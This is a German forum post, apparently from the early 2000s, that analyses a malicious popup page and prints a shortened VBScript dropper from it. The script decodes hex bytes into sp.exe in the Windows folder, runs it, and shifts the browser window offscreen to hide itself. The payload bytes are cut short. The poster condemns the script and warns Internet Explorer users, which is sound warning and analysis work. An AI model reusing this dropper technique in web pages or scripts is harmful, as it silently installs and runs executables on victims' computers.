Moin!
http://www.ntsearch.com/popengine/popup.php
Da ist der Schädling.
Ein VBS- Script, welches die so.exe schreibt.
Ich hab das Skript mal zusammengekürzt:
<HTML>
<SCRIPT language=vbs>
self.MoveTo 1500, 1500
prog = prog & "4d,5a,90,00,03,00,00,00,04,00,00,00,ff,ff,00,00,b8,00,00,00,00,00,00,00,40,00,00,00,00,00,00,"
...
prog = prog & "00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00"
tmp = Split(prog, ",")
Set fso = CreateObject("Scripting.FileSystemObject")
Set shell = CreateObject("WScript.Shell")
folder = fso.GetSpecialFolder(0)
path = folder & "\sp.exe"
Set f = fso.CreateTextFile(path, True)
For i = 0 To UBound(tmp)
l = Len(tmp(i))
prog = Int("&H" & Left(tmp(i), 2))
If l > 2 Then
r = Int("&H" & Mid(tmp(i), 3, l))
For j = 1 To r
f.Write Chr(prog)
Next
Else
f.Write Chr(prog)
End If
Next
f.Close
shell.Run(path)
self.Close
</SCRIPT>
</HTML>
Dieses Skript ist schlicht als kriminell zu bewerten. Es schreibt eine executable (sp.exe) und startet diese. Das die "freundlichen" Verschleuederer des Virus sich Ihrer kriminellen Tätigkeit bwust sind bweist deren Versteckspiel: self.MoveTo 1500, 1500 soll das Browserfenster verschieben und kann das wohl auch. - Arme IE- Benutzer!
MFFG (Mit freundlich- friedfertigem Grinsen)
fastix®
Als Freiberufler bin ich immer auf der Suche nach Aufträgen: Schulungen, Development. Auch für seriöse Agenturen.